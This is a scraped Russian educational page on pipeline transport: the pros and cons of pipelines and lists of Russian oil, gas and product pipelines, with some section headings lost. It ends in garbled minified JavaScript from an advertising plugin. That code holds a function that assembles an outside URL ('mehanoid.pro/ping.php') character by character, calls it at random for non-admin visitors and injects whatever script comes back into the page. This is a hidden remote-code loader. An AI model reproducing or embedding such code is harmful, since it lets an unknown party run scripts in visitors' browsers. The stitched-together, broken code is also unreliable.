Они перемещаются на разные расстояния — от нескольких километров до нескольких тысяч километров. Конечные пункты поставок разные: нефти — нефтеперерабатывающие заводы; природного газа, аммиака, этана, этилена — химические предприятия; угля и мазута — чаще всего электростанции.

У других видов продукции — массовые потребители (природный газ для коммунального и, особенно, бытового потребления, нефтепродукты — это бензин, керосин и т.д.). Поэтому помимо магистральных трубопроводов имеется и разветвленная разводящая сеть трубопроводов.

   Преимущества 
трубопроводного транспорта:

  1. возможность прокладки его магистралей в условиях разного рельефа местности, через большие водные пространства, в том числе моря, в условиях вечной мерзлоты;
  2. этот вид транспорта может функционировать в любых климатических и погодных условиях;
  3. низкая себестоимость транспортировки (так, транспортировка нефти по трубопроводам обходится в 3 раза дешевле, чем по железной дороге, а сетевого газа на дальние расстояния — во много раз дешевле доставки сжиженного);
  4. низкие затраты на строительство трубопроводов (более чем в два раза меньше, чем на постройку автомобильной или железной дороги с той же провозной способностью);
  5. сохранность качества благодаря полной герметизации трубы;
  6. допускает минимальные потери при транспортировке (например, по сравнению с железнодорожным транспортом потери нефти сокращаются в 1,5 раза, а по сравнению с водным — в 2,5 раза;
  7. полная автоматизация операций по наливу, перекачки, транспортировки и сливу;
  8. малочисленность персонала;
  9. непрерывность процесса перекачки;
  10. высокая пропускная способность (зависит от диаметра труб и мощности компрессорных перекачивающих станций).

   Недостатки 
трубопроводного транспорта:

  1. узкая специализация данного вида транспорта;
  2. также для рационального использования требуется мощный устойчивый поток перекачиваемого груза;
  3. относительно невысокая скорость перемещения грузов;
  4. опасность аварий, грозящих экологической катастрофой (разрыв труб и выброс нефти и газа, нарушение естественного покрова при прокладке труб, в северных районах при наземных трассах трубопроводов — помехи для миграции животных);
  5. этот вид транспорта наименее всех защищен от хищений, так как сделать отводную трубу очень просто, а проследить за многокилометровой трассой просто нереально.

Выводы 
по разделу три

      Как и все виды транспорта, трубопроводный транспорт имеет свои достоинства, и свои недостатки. Не смотря на низкую скорость доставки и потенциальную экологическую угрозу, относительно низкая себестоимость транспортировки грузов и возможность работы практически в любых условиях обеспечивает  трубопроводному транспорту конкурентное преимущество, перед другими видами транспорта.

   В настоящее время Россия обладает трубопроводной сетью, которая включает 62 тыс. км магистральных нефтепроводов и 150 тыс. км газопроводов. По нефтепроводной системе Российской Федерации перекачивается сегодня более 300 млн. т нефти. Газотранспортная система России рассчитана на 600 млрд. м3 газа.

4.1 Нефтепроводы 

Действующие нефтепроводы[2]:

  • Нефтепровод «Дружба» (рабочая мощность 66,5 млн тонн в год) — крупнейшая экспортная магистраль России (Альметьевск — Самара — Унеча — Мозырь — Брест и далее в страны Восточной и Западной Европы);
  • Альметьевск — Нижний Новгород — Рязань — Москва;
  • Нижний Новгород — Ярославль — Кириши;
  • Самара — Лисичанск — Кременчуг — Херсон, Снегирёвка — Одесса;
  • Сургут — Тюмень — Уфа — Альметьевск;
  • Нижневартовск — Самара;
  • Сургут — Полоцк;
  • Александровское — Анжеро-Судженск;
  • Красноярск — Ангарск;
  • Сургут — Омск — Павлодар — Чимкент — Чарджоу;
  • Балтийская трубопроводная система (рабочая мощность 74 млн тонн в год);
  • Восточный нефтепровод;
  • Каспийский трубопроводный консорциум (рабочая мощность 28,2 млн тонн в год);
  • Баку — Новороссийск;
  • Узень — Атырау — Самара
  • Строящиеся нефтепроводы:
  • В настоящее время ведется строительство нефтепроводов Балтийская трубопроводная система-II (35 млн тонн в год) и Заполярье — Пурпе — Самотлор.

   15 декабря 2010 года принято окончательное 
решение об инвестировании по 
проекту расширения мощности 
трубопроводной системы Каспийского 
трубопроводного консорциума (КТК-2) до 67 млн. тонн нефти в год. 

  Проектируемые:

   В ноябре 2002 года российские нефтяные компании ЛУКОЙЛ, ЮКОС, ТНК и Сибнефть — 
подписали меморандум о намерении 
строительства экспортного нефтепровода Западная Сибирь — Мурманск. Однако из-за отрицательного отношения Правительства 
Российской Федерации к появлению 
частных трубопроводов реализация проекта заморожена по настоящее 
время.

   С 2003 года в проекте участвует компания Транснефть, которая рассматривает 
в качестве альтернативы нефтепровод 
по маршруту Харьяга-Индига мощностью 50 млн. тонн нефти в год.

  1. Нефтепровод Заполярное — Пурпе

   В октябре 2010 года председатель правительства 
России В. В. Путин подписал распоряжение о строительстве нефтепровода Заполярное — Пурпе, который свяжет месторождения Ямала с нефтепроводом Восточная Сибирь — Тихий океан. Мощность нефтепровода составит 12 млн. тонн, затраты на строительство первой очереди оцениваются в 60 млрд. рублей.

4.2 Газопроводы

   Действующие газопроводы:

  • Саратов — Москва — первый газопровод в России (840 км);
  • Ставрополь — Москва;
  • Кольцевой газопровод Московской области;
  • Краснодарский край — Ростов-на-Дону — Серпухов — Санкт-Петербург;
  • Средняя Азия — Урал;
  • Медвежье — Надым — Тюмень — Уфа — Торжок;
  • Надым — Пунга — Пермь;
  • Уренгой — Сургут — Тобольск — Тюмень — Челябинск;
  • Уренгой — Помары — Ужгород — крупнейшая в мире система газопроводов, соединяет газовые месторождения Западной Сибири с конечными потребителями в Европе (4451 км);
  • газопровод, проходящий от Оренбурга через Украину в страны Восточной и Западной Европы;
  • Ямал — Европа;
  • Голубой поток;
  • Дзуарикау — Цхинвал.
    Краткая характеристика наиболее крупных газопроводов:

   Газопровод 
от месторождений природного газа в 
непосредственной близости от Саратова, в долине реки Елшанка, до Москвы. Проложен по территориям Саратовской, Пензенской, Тамбовской, Рязанской и Московской областей. Первый магистральный газопровод России.

   Протяжённость газопровода 843 км, диаметр трубы — 325 мм.

  1. Уренгой — Помары — Ужгород

   Соединяет газовые месторождения севера Западной Сибири с конечными потребителями 
в Европе. Построен в 1983 году.

   Общая длина — 4 451 км, мощность — 32 млрд. кубометров газа в год. Диаметр каждой из трёх ниток — 1420 мм.

   Соединяет газовые месторождения севера Западной Сибири с конечными потребителями 
в Европе. Проходит через территорию Белоруссии и Польши.

Пропускная 
способность — около 30 млрд. кубометров газа в год.

   Газопровод 
между Россией и Турцией, проложенный по дну Чёрного моря Трубопровод был построен в рамках российско-турецкого соглашения от 1997, по которому Россия должна поставить в Турцию 364,5 млрд.

кубометров газа в 2000—2025 гг. Затраты на строительство составили $3,2 млрд. Строительство осуществлялось российско-итальянской компанией «Блю стрим пайплаин компани Б. В.

», которой в равных долях владели «Газпром» и итальянская Eni.

   Общая протяжённость газопровода — 1213 км, из них:

  • сухопутный участок на российской стороне от города Изобильный Ставропольского края до села Архипо-Осиповка Краснодарского края на побережье Черного моря длиной 373 км;
  • морской участок от Архипо-Осиповки до терминала «Дурусу», расположенного в 60 км от города Самсун (Турция) длиной 396 км;
  • сухопутный участок на турецкой стороне от города Самсун до города Анкара длиной 444 км.

   Диаметр трубы газопровода: равнинная часть 
сухопутного участка — 1400 мм, горная часть сухопутного участка — 1200 мм, морской участок — 610 мм. Операторы газопровода — «Газпром экспорт» и турецкая Botas.

   Коммерческие 
поставки российского природного газа по газопроводу в Турцию начались в феврале 2003 года. В 2003 по «Голубому 
потоку» в Турцию поставлено 2 млрд м³ газа, 2004 — 3,2 млрд. м³, 2005 — 5 млрд. м³, 2006 — 7,5 млрд. м³, 2007 — 9,5 млрд. м³, 2008 — 10,1 млрд. м³.

   Существуют 
планы строительства продолжения 
газопровода в Израиль, Италию, а 
также расширения мощности «трубы» 
в 2 раза — до 32 млрд. м³ в год.

   Экспортный 
газопровод из России в Южную Осетию. Начинается в селе Дзуарикау (Северная Осетия) далее проходит через Кавказский хребет, затем через город Квайса, и до города Цхинвала. Является самым 
высокогорным в мире.

Открытие 
состоялось 26 августа 2009 года. Запуск газопровода 
позволил избавится Южной Осетии от зависимости от поставок газа из Грузии по газопроводу Агара-Цхинвал, которые не раз прерывались с 
грузинской стороны по политическим причинам.

Кроме того, что Грузия продавала Южной Осетии газ по 645 лари (около 450 долларов) за тыс. м³, что 
в несколько раз дороже, чем 
цена за газ из России. Общая длина — 175 км, мощность — 252,5 млн. кубометров газа в год. Диаметр трубы — 426 мм.

Рабочее давление — 50 атмосфер.

   Планируются ответвления от основной магистрали во все районы Южной Осетии.

  Строящиеся:

    1. Северный  поток. Строительство газопровода началось в начале 2010 года. Мощность газопровода должна составить 55 млрд. м³ газа в год (2 нитки).
    1. Бованенково — Ухта. Решение о строительстве газопровода было принято в октябре 2006 года, строительство начато в августе 2008 года. Проектная протяжённость газопровода — 1100 км, производительность — 140 млрд м³ газа в год.
    1. Сахалин — Хабаровск — Владивосток. Соединяет Сахалин с Приморским краем и другими регионами Дальнего Востока. Строительство газопровода было начато 31 июля 2009 года в Хабаровске.
    1. Джубга — Лазаревское — Сочи. Строительство газопровода началось в сентябре 2009 года.

  Проектируемые:

  1. Якутия—Хабаровск—Владивосток

4.3 Продуктопроводы

  1.    Крупные продуктопроводы:
  2.    · Уфа — Брест с ответвлением на Ужгород;
  3.    · Уфа — Омск — Новосибирск;

Источник: http://turboreferat.ru/transport/jekonomika-otrasli-transport-truboprovod/69582-356522-page2.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};